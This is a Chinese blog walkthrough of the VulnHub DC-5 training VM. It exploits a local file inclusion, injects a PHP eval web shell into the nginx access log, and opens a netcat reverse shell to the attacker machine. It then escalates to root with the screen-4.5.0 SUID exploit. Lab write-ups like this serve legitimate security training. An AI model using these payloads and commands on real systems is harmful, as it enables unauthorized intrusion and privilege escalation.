看完这篇 教你玩转渗透测试靶机vulnhub——DC5

简介: 看完这篇 教你玩转渗透测试靶机vulnhub——DC5

Vulnhub靶机DC5渗透测试详解
Vulnhub靶机介绍:
Vulnhub靶机下载:
Vulnhub靶机安装:
Vulnhub靶机漏洞详解:
①:信息收集:
②:文件包含:
③:反弹shell:
④:本地提权:
⑤:获取flag:
Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

从靶机DC5,,,只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:
官网地址: https://download.vulnhub.com/dc/DC-5.zip

Vulnhub靶机安装:
下载好了把安装包解压 然后试用VMware即可。

Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover发现主机

渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.8

使用命令:nmap -sS -sV -A -n 172.16.5.8

此靶机开放了80,111,48324端口,先访问80端口看看 dirb 172.16.5.8 -X .php

在Contact 中留言 发现下面的商标有所变化,猜测是不是文件包含漏洞

②:文件包含:
http://172.16.5.8/thankyou.php?file=/etc/passwd
1

通过wappalyzer插件可以知道这个网站是nginx nginx日志文件默认放在/var/log/nginx下 配置文件是/etc/nginx/nginx.conf

http://172.16.5.8/thankyou.php?file=/var/log/nginx/access.log ##看日志文件
1
使用Burp 在access.log里面传入一句话木马,然后上蚁🗡或者菜刀🔪进行连接 发现连接成功!!!

GET /hello-world! <?php @eval($_REQUEST[cmd])?> HTTP/1.1
1

③:反弹shell:
然后打开终端 发现 权限比较低 ,所以我们需要设置一个反弹的shell

在kali终端先监听一个端口4444 nc -lvp 4444 然后在蚁剑终端 执行nc -e /bin/bash 172.16.5.42 4444 老样子写交互

python -c 'import pty;pty.spawn("/bin/bash")'
1

④:本地提权:
使用命令:find / -user root -perm -4000 -print 2>/dev/null 查看是否有可利用的suid,发现screen-4.5.0

使用命令:searchsploit screen 4.5.0 把 这个两个都放到桌面

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.txt
1
2
3

第一步:将上部分的c语言代码另存为libhax.c文件 然后gcc编译:gcc -fPIC -shared -ldl -o libhax.so libhax.c

第二步:将第二部分的C语言代码写入rootshell文件中,并编译成rooshell文件,然后删除rootshell.c文件

第三步:将剩下部分的脚本代码写入到dc5.sh文件中,在开头加上#!/bin/bash注明执行环境

保存需要输入为set ff=unix,是为了防止脚本的格式错误(这很重要!!!!)

为dc5.sh增加可执行权限,执行dc5.sh文件,成功获取到root权限

⑤:获取flag:

至此获取到了flag,渗透测试结束。
————————————————
版权声明:本文为CSDN博主「落寞的魚丶」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Aluxian_/article/details/123726473

相关文章
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
56 0
|
安全 搜索推荐 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
435 0
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
|
1月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
83 0
|
1月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
26 0
|
8月前
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
62 0
|
8月前
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1
106 1
|
8月前
|
存储 网络协议 Shell
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
52 0
VulnHub靶机DC2渗透测试笔记
|
8月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
197 0
|
8月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:2
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:2
77 0
|
8月前
|
存储 安全 网络安全
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:1.0.1
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:1.0.1
77 0

热门文章

最新文章